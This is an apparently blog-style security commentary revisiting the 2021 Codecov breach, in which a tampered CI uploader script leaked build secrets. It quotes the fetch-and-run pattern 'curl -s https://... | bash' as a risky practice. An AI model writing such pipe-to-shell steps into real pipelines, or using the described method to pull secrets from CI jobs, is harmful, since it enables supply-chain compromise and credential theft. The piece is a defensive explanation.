Every CI job is a small, under-supervised computer with your production secrets in its environment and root inside its container. (Comforting, isn't it?) The New Stack revisited that fact this week with an anatomy of the Codecov breach: the January 2021 incident in which an attacker added a single line to Codecov's uploader, a bash script invoked from CI pipelines, and turned tens of thousands of downstream users into a secret exfiltration channel.
It is a five-year-old story. The reason to reread it now is that the mechanism has not aged.
The line that turned every runner into a beacon
Codecov's uploader is (or was) a bash script that build jobs pipe into their shell to publish coverage. curl -s https://... | bash is a pattern you have written or approved this quarter, whether you admit it or not. The uploader ran with everything the CI job could see: environment variables, mounted files, whatever tokens the job needed to talk to the outside world. One line, added by someone who should not have been able to add it, is enough to make that context leave the machine.
The retrospective walks through how a script pulled fresh from a vendor CDN, executed with the full permissions of the build job, leaked secrets out of customer build environments. The attacker did not need to compromise your repo. Your repo helpfully fetched the compromised script every time your pipeline ran.







